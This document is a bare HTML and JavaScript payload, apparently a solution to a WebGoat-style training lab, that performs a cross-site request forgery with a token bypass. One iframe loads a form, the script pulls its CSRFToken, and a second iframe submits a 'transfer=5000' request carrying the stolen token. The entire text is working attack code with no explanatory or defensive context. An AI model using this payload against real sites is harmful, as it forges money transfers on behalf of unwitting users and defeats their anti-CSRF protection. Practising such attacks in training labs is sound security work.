<iframe src="attack?Screen=1721642316&menu=900&transfer=main" onload="first();" id="first"></iframe>
<iframe id="second"></iframe>

<script type="text/javascript">
    var token;

    function first() {
        var frame = document.getElementById("first").contentDocument;
        var form = frame.getElementsByTagName("form")[0];
        token = '&CSRFToken=' + form.CSRFToken.value;

        console.log(token);

        second();
    }

    function second() {
        var frame = document.getElementById("second");
        frame.src = "attack?Screen=1721642316&menu=900&transfer=5000" + token;
    }
</script>